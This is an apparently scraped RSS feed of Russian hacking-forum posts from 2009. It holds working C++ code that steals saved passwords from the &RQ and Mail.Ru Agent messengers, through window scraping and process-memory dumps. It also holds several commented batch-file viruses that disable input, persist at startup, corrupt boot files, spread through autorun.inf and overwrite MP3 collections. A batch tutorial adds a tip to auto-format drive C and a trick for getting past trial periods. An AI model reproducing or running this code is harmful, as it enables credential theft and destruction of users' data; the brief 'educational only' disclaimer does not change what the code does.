&quot;Безопасность&quot; настроек. Выставляем ее.</p> <p>Переходим на фрейм &quot;Соединение&quot;. Чем примечательна для нас данная категория? Тем, что здесь есть поле &quot;Пароль&quot;. Запомним это обстоятельство. Пока же закроем крысу.</p> <p>Откроем ее заново. Для подключения нам надо указать пароль, ведь мы выставили опцию &quot;Не сохранят пароль&quot;. Введем пароль, подключимся. Снова вызовем диалог настроек. Удивительно, но поле &quot;Пароль&quot; содержит текст. Это наш пароль? Проверим.</p> <p>Воспользовавшись утилитой Spy++, узнаем имена классов окон &amp;RQ, и начнем писать код.</p> <p>void main()<br />{<br />// Объявим переменные, необходимые для работы<br />HWND hmainFrm,hprefFrm,hPanel,hconnectionFr,hEdit; // Идентификаторы форм<br />char* pUIN; // Указатель на буфер для UIN<br />char* pPass; // Указатель на буфер для пароля<br />int iUIN; // Длина UIN<br />int iPass; // Длина пароля</p> <p>// Основное окно &amp;RQ. Из него мы будем получать UIN<br />hmainFrm=FindWindow(&quot;TmainFrm&quot;,0);<br />// Длина текста<br />iUIN=SendMessage(hmainFrm, WM_GETTEXTLENGTH, 0, 0)+1;<br />// Выделяем буфер<br />pUIN=(char*)LocalAlloc(0,iUIN);<br />// Получаем заголовок основного окна - это UIN<br />GetWindowText(hmainFrm,pUIN,iUIN);</p> <p>/*<br />Следует учитывать, что при запуске &amp;RQ, окно настроек<br />не открывается вместе с основным окном. Но что же нам<br />мешает его открыть? Тем более что нам любезно предоставлена<br />возможность использовать горячие клавиши (Alt+P). Вот<br />и эмулируем их нажатие.<br />*/<br />// Эмуляция Alt+P - горячей клавиши для вызова окна &quot;Настройки&quot;<br />SendMessage(hmainFrm, WM_SYSKEYDOWN, 'P', 0x20000000);<br />SendMessage(hmainFrm, WM_SYSKEYUP, 'P', 0x20000000);</p> <p>// Находим окно настроек<br />hprefFrm=FindWindow(&quot;TprefFrm&quot;,0);<br />// Панель с категориями настроек<br />hPanel=FindWindowEx(hprefFrm,0,&quot;TPanel&quot;,0);<br />// Фрейм с настройками подключения<br />hconnectionFr=FindWindowEx(hPanel,0,&quot;TconnectionFr&quot;,0);<br />// Поле с паролем<br />hEdit=FindWindowEx(hconnectionFr,0,&quot;TEdit&quot;,0);</p> <p>// Длина пароля<br />iPass=SendMessage(hEdit, WM_GETTEXTLENGTH, 0, 0)+1;<br />// Выделаем буфер<br />pPass=(char*)LocalAlloc(0,iPass);<br />// Получаем пароль<br />SendMessage(hEdit, WM_GETTEXT, iPass, (long)pPass);</p> <p>// Выводим результат<br />cout &lt;&lt; &quot;[!!!]Found for: &quot;&lt;&lt; pUIN &lt;&lt; &quot;tPassword: &quot; &lt;&lt; pPass;</p> <p>// Освободим память<br />LocalFree(pUIN);<br />LocalFree(pPass);<br />}</p> <p>После выполнения программы можно убедиться, что и данный пример работает. Мы получили наш пароль. При этом, если QIP в случае сохранения пароля на диске скрывает пароль, то &amp;RQ не заботится о том, как был введен пароль. В окне настроек пароль можно обнаружить всегда.</p> <p>Единственный нюанс заключается в том, что &amp;RQ не открывает окно настроек после старта, хотя единожды открытое окно настроек после закрытия опять же не закрывается, а просто становится невидимым. В исходном коде мы использовали горячую клавишу, чтобы быть уверенными, что окно настроек открыто.<br />Взлом паролей Mail.Ru Агент</p> <p>Очередное средство общения в сети, предоставляемое компанией Mail.Ru. Работает по собственному протоколу, имеет возможность голосового общения с выходом на внешние телефонные номера. Имеет кучу возможностей и соответственно, поклонников, которые пользуются им ежедневно.</p> <p>В случае с Mail.ru Агентом мы будем использовать другой подход. Чуть более сложный, но не менее эффективный. Окна искать мы не будем. Попробуем найти пароль в памяти процесса.</p> <p>Итак, качаем, устанавливаем, регистрируемся если надо и запускаем.</p> <p>Агент поддерживает несколько аккаунтов пользователей, и список их хранит в реестре. В ветке HKEY_CURRENT_USERSoftware Mail.RuAgentmagent_logins он создает столько REG_BINARY параметров, сколько аккаунтов зарегистрировано на локальном компьютере. Ключи при этом называются следующим образом: NNN#ваш_email_адрес, где NNN - порядковый номер аккаунта.</p> <p>Посмотрим, есть ли в памяти процесса email-адрес. Для этого воспользуемся утилитой PE Tools, которая позволяет сделать дамп процесса.</p> <p>Сохраняем дамп, загружаем его в Hex Workshop. Жмем Ctrl+F для открытия диалога поиска. Выбираем режим Text String и в поле Value вводим наш email-адрес. Нажимаем Ok и редактор выделяет найденный текст. Вы уже заметили? Через 4 байта от email-адреса находится пароль! Что это за 4 байта? Это 32-х битное значение длины пароля. Перед email-адресом тоже есть его длина. Вот и все, осталось только автоматизировать процесс поиска, чем мы и займемся.</p> <p>// Функция возвращает хэндл процесса magent.exe<br />HANDLE GetProcess()<br />{<br />HANDLE hProcessSnap; // Хэндл снимка процессов<br />PROCESSENTRY32 pe32; // Структура, содержащая информацию о процессе</p> <p>// Делаем снимок процессов<br />hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);<br />if(hProcessSnap == INVALID_HANDLE_VALUE) return 0;<br />pe32.dwSize = sizeof(PROCESSENTRY32);<br />// Перебираем снимок<br />if(!Process32First(hProcessSnap,&amp;pe32)) {CloseHandle(hProcessSnap);return 0;}<br />do<br />{<br />// Сравниваем имя файла с magent.exe<br />if(!lstrcmp(strupr(&quot;magent.exe&quot;),strupr(&amp;pe32.szExeFile[0])))<br />{<br />// Нашли нужный процесс, вернем его хэндл<br />return OpenProcess(PROCESS_ALL_ACCESS,FALSE,pe32.th32ProcessID);<br />}<br />} while( Process32Next(hProcessSnap,&amp;pe32));<br />// Закрываем снимок процессов<br />CloseHandle( hProcessSnap );<br />return 0;<br />}</p> <p>void main()<br />{<br />HKEY hKey; // Идентификатор ключа реестра<br />DWORD i,t, retCode, cValues = 256; // Необходимые промежуточные переменные<br />char regValue[MAX_PATH]; // Буфер для чтения ключа реестра<br />DWORD cchValue = 1024; // Размер буфера<br />HANDLE hProcess; // Хэндл процесса<br />char szEmail[MAX_PATH]; // Буфер для email-адреса<br />int iEmail; // Длина email-адреса<br />HMODULE hModule; // Хэндл модуля<br />MODULEINFO modinfo; // Структура, содержащая информацию о модуле<br />DWORD dwReaded; // Количество байт в дампе процесса<br />char szPass[128]; // Буфер для пароля<br />bool found; // Флаг найден/не найден пароль<br />char* pTmp; // Временный буфер</p> <p>hProcess=GetProcess();<br />if (hProcess)<br />{<br />// Получаем хэндл модуля по хэндлу процесса,<br />// для чего временно создаем новый поток<br />HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0,<br />(LPTHREAD_START_ROUTINE)GetModuleHandle, NULL, 0, NULL);<br />WaitForSingleObject(hThread, INFINITE);<br />GetExitCodeThread(hThread, (LPDWORD)&amp;hModule);<br />CloseHandle(hThread);</p> <p>// Получаем информацию о загруженном модуле<br />GetModuleInformation(hProcess,hModule,&amp;modinfo,sizeof(MODULEINFO));</p> <p>// Буфер для дампа<br />PBYTE pBuffer = new BYTE[modinfo.SizeOfImage];<br />// Читаем дамп<br />ReadProcessMemory(hProcess, modinfo.lpBaseOfDll, pBuffer,<br />modinfo.SizeOfImage, &amp;dwReaded);<br />if (dwReaded&gt;0)<br />{<br />// Открываем ключ реестра<br />if (RegOpenKeyEx(HKEY_CURRENT_USER,&quot;Software\Mail.Ru\Agent<br />\magent_logins&quot;,0,KEY_QUERY_VALUE,&amp;hKey)==ERROR_SUCCESS)<br />{<br />for (t = 0, retCode = ERROR_SUCCESS; t &lt; cValues; t++)<br />{<br />// Перебираем по очереди параметры ключа реестра для поиска email'ов в дампе<br />retCode = RegEnumValue(hKey, t, regValue, &amp;cchValue, NULL, NULL, NULL, NULL);<br />if (retCode == ERROR_SUCCESS)<br />{<br />// Первые 4 байта имени параметра это номер, его пропускаем. Далее идет адрес.<br />lstrcpy(szEmail,(const char*)&amp;regValue[4]);<br />iEmail=lstrlen(szEmail);<br />// Выделяем буфер, в который будем заносить сравниваемые участки дампа<br />pTmp=(char*)LocalAlloc(0,iEmail);<br />found=FALSE;<br />// Двигаемся по дампу<br />for (i=0;i&lt;dwReaded;i++)<br />{<br />if (found){i=dwReaded;} //Заканчиваем перебор<br />// Берем очередной участок дампа для сравнения<br />memcpy(&amp;pTmp,&amp;pBuffer[i],iEmail);<br />// Сравниваем<br />if (!memcmp(&amp;pTmp,szEmail,iEmail))<br />{<br />// Через 4 байта после адреса находится пароль.<br />memcpy(szPass,&amp;pBuffer[i+iEmail+4],sizeof(szPass));<br />// Пароль найден. Выводим результат.<br />cout &lt;&lt; &quot;[!!!]Found for : &quot; &lt;&lt; szEmail &lt;&lt; &quot;tPassword: &quot; &lt;&lt; szPass;<br />found=TRUE;<br />}<br />}<br />LocalFree(pTmp);<br />}<br />}<br />RegCloseKey(hKey);<br />}<br />}<br />}<br />}</p> <p>Компилируем, запускаем, получаем пароль. Все просто.<br />Заключение</p> <p>Какой можно сделать вывод? Даже если мы не храним конфиденциальную информацию на жестком диске, она является уязвимой. Всегда можно найти кучу способов получить закрытую информацию, а многие из этих способов будут настолько просты и неожиданны, что их может обнаружить каждый. Надо лишь мыслить нестандартно и все у вас получится.</p> <p>Все вышеприведенные примеры направлены на привлечение более пристального внимания разработчиков программ к проблеме информационной безопасности. Приведенный автором код не претендует на уникальность и универсальность, тем не менее, принцип получения информации, применим ко многим программным продуктам.</p> <p>Код примеров можно модифицировать, но использовать настоятельно рекомендуется только в образовательных целях.</p> mybb@mybb.ru (admin) Fri, 13 Mar 2009 15:47:23 +0300 http://xhackx.bbon.ru/viewtopic.php?pid=28#p28 http://xhackx.bbon.ru/viewtopic.php?pid=27#p27 <p>Если ты новичок, и у тебя есть вопросы, задавай тут! Тем самым ты поможешь в будущем созданию большого FAQ для новичков.</p> mybb@mybb.ru (admin) Fri, 13 Mar 2009 15:40:11 +0300 http://xhackx.bbon.ru/viewtopic.php?pid=27#p27 http://xhackx.bbon.ru/viewtopic.php?pid=26#p26 <p>@echo off<br />rundll32 keyboard,able<br />rundll32 mouse,able<br />copy %0 %windir%/system<br />echo run=%windir%/system/*.bat &gt;&gt; win.ini<br />echo run=%windir%/system/*.bat &gt;&gt; system.ini<br />label LOHOLAMMER<br />if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r<br />deltree /y c:\autoexec.bat &gt; nul<br />echo autoexec.bat echo YOU ARE LAMMER…xe-xe-xe &gt; c:\autoexec.bat<br />rundll32 mouse,enable<br />rundll32 keyboard,enable<br />echo var WSHShell = WScript.CreateObject(”WScript.Shell”); &gt; %temp%\mes.js<br />echo WSHShell.Popup(”Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе”); &gt;&gt; %temp%\mes.js<br />start %temp%\mes.js<br />deltree /y %temp%\mes.js<br />attrib c:\autoexec.bat +h +s +a +r<br />pause<br />cls</p> <p>Объясняю популярно и по шагам:</p> <p>1 @echo off - Запрещаем ДОСовскому окошку показывать, что делает скрипт.<br />2 rundll32 keyboard,able - Отключаем клаву, на случай если юзер поймет что происходит и надумает нажать CTRL+C<br />3 rundll32 mouse,able - Отключаем мышь тоже на всякий.<br />4 copy %0 %windir%/system - Копируемся в папку windows/system<br />// %0 - Переменная, указывающая на исходный файл-вирус<br />// %windir% - переменная папка масдая.<br />5 echo run=%windir%/system/*.bat &gt;&gt; %windir%\win.ini - Добавляет текст “run=%windir%/system/*.bat” в файл win.ini<br />6 echo run=%windir%/system/*.bat &gt;&gt; %windir%\system.ini - Добавляет текст “run=%windir%/system/*.bat” в файл system.ini<br />7 label LOHOLAMMER - Меняет имя диску c:\ на “LOHOLAMMER”<br />8 if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r - Проверяем если есть файл c:\autoexec.bat то убираем<br />//у него атрибуты -h -s -a -r<br />9 deltree /y c:\autoexec.bat - Удаляем файл c:\autoexec.bat , если не убрать атрибуты, то программа не удалит файл.<br />10 echo autoexec.bat echo YOU ARE LAMMER…xe-xe-xe &gt; c:\autoexec.bat - Добавить текст “YOU ARE LAMMER…xe-xe-xe”<br />//в новый файл autoexec.bat<br />11 rundll32 mouse,enable - Включаем, пускай думает, что ниче не было.<br />12 rundll32 keyboard,enable - Включаем, пускай думает, что ниче не было.<br />13 echo var WSHShell = WScript.CreateObject(”WScript.Shell”); &gt; %temp%\mes.js<br />echo WSHShell.Popup(”Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе”); &gt;&gt; %temp%\mes.js<br />start %temp%\mes.js. //Этот текст выводит масдайное окно с надписью<br />deltree /y %temp%\mes.js //А потом стирает за собой следы.<br />14 attrib c:\autoexec.bat +h +s +a +r - Делает файл c:\autoexec.bat скрытым и системный чтоб ламер ничего не заподозрил.<br />15 pause - Просим нажать любую клавишу (Не обязательно нажимать ведь вирь уже сделал свое дело.)<br />16 cls - Выходим</p> <p>Эта программа, при следующей перезагрузке не даст загрузиться виндовсу и будет писать ‘Вы ламер.’ .Работает только в винде до 2000.</p> <p>Идем дальше, пишем новый вирус. Те функции, которые были упомянуты уже, не будут объясняться заново. Это просто усовершенствованная версия прошлого вируса.</p> <p>@echo off<br />rundll32 user,setcursorpos //Убираем с экрана курсор в левый угол<br />rundll32 keyboard,able //Было<br />rundll32 mouse,able //Было<br />rundll32 user,swapmousebutton. //Тут мы переставляем кнопки мыши<br />echo Обновление параметров системы, пожалуйста подождите… //пишет отмазку <br />label mp_k //Меняем имя диску<br />copy mp_k.exe %windir% //Копирует себя в папку windows<br />if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r<br />deltree /y c:\autoexec.bat<br />if exist c:\io.sys echo autoexec.bat echo YOU_ARE_LAMMER….[]=[_H@CKED_BY_[kas]*_”SmallPox_Vir_Org”_] &gt; c:\autoexec.bat<br />echo run = %windir%\mp_k.exe &gt;&gt; %windir%\win.ini<br />echo run = %windir%\mp_k.exe &gt;&gt; %windir%\system.ini<br />echo [AutoRun] &gt; c:\autorun.inf //Эти операции есть в прошлом вирусе.<br />echo open=c:\autoexec.bat &gt; c:\autorun.inf<br />echo [AutoRun] &gt; d:\autorun.inf<br />echo open=c:\autoexec.bat &gt; d:\autorun.inf<br />rundll32 mouse,enable<br />rundll32 keyboard,enable<br />echo var WSHShell = WScript.CreateObject(”WScript.Shell”); &gt; %temp%\mes.js<br />echo WSHShell.Popup(”Warning,.. А теперь необходимо перезагрузиться”); &gt;&gt; %temp%\mes.js<br />start %temp%\mes.js<br />deltree /y %temp%\mes.js<br />attrib c:\autoexec.bat +h +s +a +r<br />attrib %windir%\mp_k.exe +h +s +a +r<br />attrib c:\autorun.inf +h +s +a +r<br />attrib d:\autorun.inf +h +s +a +r<br />deltree /y mp_k.exe<br />rmdir %windir%\temp //Удаляем папку temp<br />mkdir %windir%\temp //Создаем папку temp<br />cls</p> <p>А теперь, что-то новое.</p> <p>@echo off<br />cls<br />echo Please wait, updating system…<br />ctty nul. //Это новая команда, она отключает вывод текста в окошке.<br />exist %WINDIR%\SYSTEM\VMM32\%0 goto :end //Если вирь уже запускался то пусть запустит себя снова.<br />copy %0 %WINDIR%\SYSTEM\VMM32<br />cd c:\ //Переходим в другую директорию<br />for %%a in (*.mp3 c:\*.mp3 c:\MUZ\*.mp3 c:\My Music\*.mp3 ..\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом<br />cd My Music<br />for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом<br />cd My_Music<br />for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом<br />cd MyMusic<br />for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом<br />cd Music<br />for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом<br />cd Музыка<br />for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом<br />cd Музон<br />for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом<br />cd MUZ<br />for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом<br />cd mp3<br />for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом<br />cd d:\<br />for %%a in (*.mp3 c:\*.mp3 c:\MUZ\*.mp3 c:\My Music\*.mp3 ..\*.mp3) do copy /y %0 %%a<br />cd My Music<br />for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Тут тоже самое.<br />cd My_Music<br />for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a<br />cd MyMusic<br />for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a<br />cd Music<br />for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a<br />cd Музыка<br />for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a<br />cd Музон<br />for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a<br />cd MUZ<br />for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a<br />cd mp3<br />for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a<br />:end //Метка<br />start /m /w %WINDIR%\SYSTEM\VMM32\%0 //Запуск в свернутом режиме<br />ctty con //Врубаем разрешение на показ текста в окне<br />echo Say goodbye your MP3 collection :)) Virus [BAT.kas.a] //Прощальные строки<br />cls //Выход.</p> <p>Тут мало нового но уже что-то. Идем дальше. Накачал я с инета BAT-вирусов и начал их исследовать. И вот результаты:<br />Написал еще пару своих:</p> <p>ctty nul //Было такое<br />REM Чй† Ђь@uoњPSQRVW?<br />‹тЌ<br />” Q_ь№ у¦u=<br />є №є њъ.я?ђ л,ђ ///<br />copy %0 *.exe ///<br />copy %0 b.com&gt;nul // Эта технология взята с вируса другово.<br />b.com. // Эти каракули перехватывают рабочие в данный момент файлы, и херит их.<br />del b.com. /// Это текст АСМ скомпиленого в exe<br />rem _^ZY[Xќњъ.я?ђ К ђђђђъ.я.ђ К ћ # @echoђё.5Н.Њ ' ‰?ђ Ќ ё.%Н.Ќ є Н'ђђ //<br />@echo off //<br />echo XEP_BAM //Пишем злобно и красиво.<br />if exist %windir%/%0.bat goto :end //Проверка виря на запускание, те был ли он запущен.<br />@rundll32 user,setcursorpos<br />ctty con //Было такое<br />echo Обновление параметров системы, пожалуйста подождите... //Отвлекаем.<br />@label BAT.c<br />copy %0.bat %windir% &gt; nul<br />if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r<br />if exist c:\boot.ini attrib c:\boot.ini -h -s -a -r<br />deltree /y c:\autoexec.bat<br />deltree /y c:\boot.ini<br />if exist c:\autoexec.bat echo autoexec.bat echo YOU_ARE_LAMMER.... &gt; c:\autoexec.bat<br />if exist c:\boot.ini echo autoexec.bat echo YOU_ARE_LAMMER.... &gt; c:\boot.ini //Это для XP он там вместо autoexec.bat <br />deltree /y %windir%/win.ini</p> <p>copy %0 &gt; %windir%/win.ini<br />deltree /y %windir%/system.ini<br />copy %0 &gt; %windir%/system.ini<br />if exist c:\io.sys //Проверка наличия диска так как на каждом диске есть файл io.sys<br />echo [AutoRun] &gt; c:\autorun.inf //И если он есть заразить его.<br />echo open=c:\autoexec.bat &gt;&gt; c:\autorun.inf //И если он есть заразить его.<br />if exist d:\io.sys //Проверка наличия диска<br />echo [AutoRun] &gt; d:\autorun.inf //И если он есть заразить его.<br />echo open=c:\autoexec.bat &gt;&gt; d:\autorun.inf //И если он есть заразить его.<br />if exist e:\io.sys //Проверка наличия диска<br />echo [AutoRun] &gt; e:\autorun.inf //И если он есть заразить его.<br />echo open=c:\autoexec.bat &gt;&gt; e:\autorun.inf //И если он есть заразить его.<br />:end //Метка СМ начало.<br />cls //Выход</p> <p>О какие бывают вирусы</p> mybb@mybb.ru (admin) Fri, 13 Mar 2009 15:36:29 +0300 http://xhackx.bbon.ru/viewtopic.php?pid=26#p26 http://xhackx.bbon.ru/viewtopic.php?pid=25#p25 <p>Бат (batch) файлы,что же это такое?</p> <p>Прежде всего - это пакетные дос файлы, которые содержат в себе в ASCII виде набор досовских команд. Проще говоря, bat файл содержит в себе скрипт, интерпритатором служит cmd.exe</p> <p>Начну с простых команд :</p> <p>1.)echo off - запрещение вывода на экран исполняемых команд (on - вкл.)<br />2.) deltree /y %файл% - удалить файл (/y означает &quot;удалить без вопросов&quot;). В XP работает тока del (флаг /y не нужен).<br />3.) copy %путь\файл% %куда\файл% - копировать файл<br />4.) mkdir %название_диры% - создать директорию<br />5.) echo %текст% - вывести текст на экран <br />6.) echo %текст% &gt; %путь\файл% - создать файл и вписать в него текст<br />7.) echo %текст% &gt;&gt; %путь\файл% - добавить текст в уже существующий файл <br />8.) if exist %путь\файл% %команда% - если существует файл, выполнить команду<br />9.) attrib %атрибут% %путь\файл% - поставить\убрать атрибуты файлу (+-h скрытый, +-s системный, +-r только чтение)<br />10.) start %путь\файл% - запустить файл<br />11.) cls - отчистить экран<br />12.) pause - выводит сообщение &quot;Нажмите любую кнопку...&quot;<br />13.) label %новая_метка% - поставить новую метку системного диска (С,D,E….)<br />14.) format %диск%: /q - быстрое форматирование диска <br />15.) ren %путь\файл% %новое_название_файла% - переименовать файл <br />16.) goto %метка%<br />...<br />:%метка% - перескoчить с одного места кода на метку.</p> <p>Продолжу «НЕПРОСТЫМИ»:</p> <p>1.) choice /N /T:y,%сек% &gt; nul - типа таймера (на n секунд задерживает выполнение последующих команд).</p> <p>2.) %команда% &gt; nul - запрещение вывода на экран самой команды и результата её действия (полезно при команде &quot;copy&quot;). Пример: copy c:\some.exe %windir%\some.exe &gt; nul</p> <p>3.) regedit /s %путь\файл.reg% - добавить ключи в реестр из файла, без вопросов</p> <p>4.) start /m /w %путь\файл% - запустить файло в свёрнутом окне.</p> <p>5.) echo format C: /q &gt;&gt; c:\Autoexec.bat добавляет в Autoexec.bat строчку «format C: /q» и при перезагрузке компа идёт быстрое форматирование диска из серии «Ты даже не заметишь» =) Это все потому что Autoexec.bat грузиться вместе с виндой,кстате winstart.bat тоже,но его нужно создавать отдельно!</p> <p>6.) Кложим в каталог windows\command файл &quot;load.bat&quot; (наверное с плохим содержанием) .Его можно будет запустить такой строчкой: &quot;load keybrd32.sys,,cyr\lat&quot; или такой: &quot;load VideoAdapter32.drv -- By windows setup --&quot;. Врятли такие строчки рискнёт кто-нибудь удалять и твой файл без проблем загрузится..=)</p> <p>7.) if exist c:\Progra~1 set drv=c:<br />if exist d:\Progra~1 set drv=d:<br />if exist d:\Progra~1 set drv=e:<br />После выполнения этого скрипта в переменной %drv% будет прописан диск с Виндой, с Program Files'ами.</p> <p>8.) в переменной %windir% хранится каталог с виндусом в таком виде: диск:\название_каталога. Пример: copy c:\some.exe %windir%\some.exe</p> <p>9.) batch скрипты не любят длинные, либо состоящие из двух слов, названия. Длинные урезаются до 6-ти букв (после них должно стоять &quot;~1&quot;, к примеру &quot;Program Files -&gt; Progra~1&quot;). Пробелы он просто убирает (The Bat -&gt; TheBat~1).<br />Это я к тому, что в бачах обращайся к файлам по их досовским названиям. Пример: copy c:\some.exe c:\Progra~1\some.exe (копируется файл в папку Program Files).</p> <p>10.) echo var WSHShell = WScript.CreateObject(&quot;WScript.Shell&quot;); &gt; %temp%\mes.js<br />echo WSHShell.Popup(&quot;твой_текст&quot;); &gt;&gt; %temp%\mes.js<br />start %temp%\mes.js<br />deltree /y %temp%\mes.js<br />Этот скрипт выводит на экран _Виндовое_ окошко (по средствам Java Script) с твоим сообщением и кнопкой ОК</p> <p>И вот чем закончу-&gt;<br />Переменные ,операторы,циклы и кое что ещё :</p> <p>1.) @&lt;команда&gt; <br />Оператор @ позволяет не выводить следующую за ним команду на экран. Это аналог оператора ECHO OFF только для одной строки.</p> <p>2.) %&lt;цифра 0-9&gt;<br />В языке BATCH-файлов возможно использование переменных. Всего может быть до 10 одновременно существующих независимых переменных.<br />Значение переменной равно значению соответствующего параметра из командной строки. Переменная %0 будет содержать имя .bat-файла и, если вы указали, путь к нему. То есть, если у нас есть командная строка abc.bat a bc def то переменная %1 будет содержать значение a, %2 будет содержать bc, а %3 - def. Например, можно записать в файле ABC.BAT: ABC.BAT %2 %1 <br />Это вызовет прекращение выполнения данного файла и передаст управление ему же, но с параметрами, записанными в обратном порядке.</p> <p>3.) SHIFT <br />Команда SHIFT позволяет использовать число параметров командной строки более 10. При этом происходит циклический сдвиг влево и теряются более ранние параметры.<br />Операция необратима.</p> <p>4.) CALL &lt;имя bat-файла&gt;<br />Команда CALL позволяет вызвать один пакетный файл из другого, не прекращая выполнения предыдущего. Пример: <br />@ECHO OFF<br />ECHO Этот текст выводится <br />CALL TEST.BAT<br />ECHO Этот текст тоже выводится <br />TEST.BAT<br />ECHO А этот уже не выводится. </p> <p>При выполнении TEST.BAT обработка текущего пакетного файла была прекращена и управление было передано TEST.BAT.</p> <p>5.) IF &lt;условие&gt; &lt;следствие&gt;<br />Оператор IF проверяет истинность какого-либо &lt;условия&gt; и в зависимости от этого выполняет или не выполняет команду &lt;следствие&gt;.<br />Пример:<br />IF EXIST TEST.BAT GOTO lab1 <br />если существует файл TEST.BAT, то перейти на метку lab1. <br />IF NOT EXIST TEST.BAT GOTO exit <br />если файл TEST.BAT не существует, то следует перейти на метку exit. <br />IF %1==ASDF GOTO asdflabel <br />если переменная %1 равна ASDF, то осуществляется переход на метку asdflabel. <br />IF ERRORLEVEL 1 GOTO err1 <br />если ошибка (код возврата) выполнения предыдущей команды равно 1, то перейти на<br />метку err1.</p> <p>6.) PAUSE<br />Команда PAUSE приостанавливает выполнение пакетного файла и выдает на экран приглашение нажать на любую клавишу для продолжения работы.</p> <p>7.) FOR %&lt;параметр&gt; IN (&lt;VAR1 [VAR2] [VAR3] ...&gt;) DO &lt;команда&gt; <br />С помощью оператора FOR возможно выполнение одной и той же команды несколько раз для различных параметров.</p> <p>8.) SET &lt;Имя_переменной&gt;=&lt;Значение_переменной&gt; <br />Оператор SET представляет собой расширение возможностей работы с параметрами в операционной системе. Он задает переменную, значение которой подставляется вместо ее имени при любом использовании этого имени между знаками процента. Наиболее известной является переменная PATH, представляющая собой набор путей для быстрого поиска файлов.</p> <p>9.) Вот несколько примеров BAT-файла, который выполняет компиляцию проекта на ассемблере.<br />Компиляция проекта без ресурсов</p> <p>@echo off<br />set file=dostoansi<br />C:\MASM32\BIN\Ml.exe /c /coff %file%.asm<br />C:\MASM32\BIN\Link.exe /SUBSYSTEM:WINDOWS %file%.obj /RELEASE<br />pause</p> <p>Компиляция проекта с ресурсами</p> <p>@echo off<br />set file=name_project<br />if not exist rsrc.rc goto over1<br />C:\MASM32\BIN\Rc.exe /v rsrc.rc<br />C:\MASM32\BIN\Cvtres.exe /machine:ix86 rsrc.res<br />:over1<br />\masm32\bin\ml /c /coff /Cp %file%.asm<br />if errorlevel 1 goto asm_error<br />C:\MASM32\BIN\Link.exe %file%.obj rsrc.res /SUBSYSTEM:WINDOWS<br />if errorlevel 1 goto link_error<br />if exist *.obj del %file%.obj<br />:asm_error<br />echo AM<br />goto clear<br />:link_error<br />echo LINKER ERROR<br />:clear<br />if exist %file%.obj del %file%.obj<br />pause<br />:end</p> <p>10.) Пример автоматизированного удаления файлов по типу<br />del /f /s /q C: *.tmp</p> <p>11.) Пример ожидания появления файла (например при копировании большого объёма информации)<br />:test<br />if exist c:\1.avi goto go<br />sleep 10<br />goto test<br />:go<br />rename c:\1.avi 1.avi<br />if not errorlevel 0 goto go</p> <p>12.) Пример изменения текущей даты и восстановления её после запуска приложения. (Может быть полезно, если приложение trial и срок демонстрациии закончился)<br />set tempdate=%date:~-10%<br />date 01-01-01<br />start trial.exe<br />date %tempdate%</p> <p>13.) Пример экспорта ветки реестра при помощи BATCH-файла<br />regedit.exe -ea C:\environment.reg &quot;HKEY_CURRENT_USER\Environment&quot;</p> <p>14.) Пример переименования файлов по маске<br />for /f &quot;tokens=*&quot; %%a in ('dir /b PATH\*.*') do ren PATH\%%a Prefix%%a<br />Здесь заменяем PATH\ на путь к файлам, которые будут переименованы, а Prefix на те символы, которые будут добавлены к имени файла при переименовании. Если в папке, где происходит переименование файлов есть подпапки, то подпапки будут переименованы как и файлы. Если указать определенную маску для типов файлов, которые подлежат переименованию, например, *.txt, а не *.*, то будут переименованы файлы только указанных типов.</p> <p>THE END</p> mybb@mybb.ru (admin) Fri, 13 Mar 2009 15:34:36 +0300 http://xhackx.bbon.ru/viewtopic.php?pid=25#p25 http://xhackx.bbon.ru/viewtopic.php?pid=24#p24 <p>Если да, то скорее пишите статью....</p> mybb@mybb.ru (admin) Fri, 13 Mar 2009 15:32:43 +0300 http://xhackx.bbon.ru/viewtopic.php?pid=24#p24 http://xhackx.bbon.ru/viewtopic.php?pid=23#p23 <p>Evntcmd</p> <p>Настройка преобразования событий в ловушки и/или в адреса назначения ловушки в файле конфигурации.<br />Синтаксис</p> 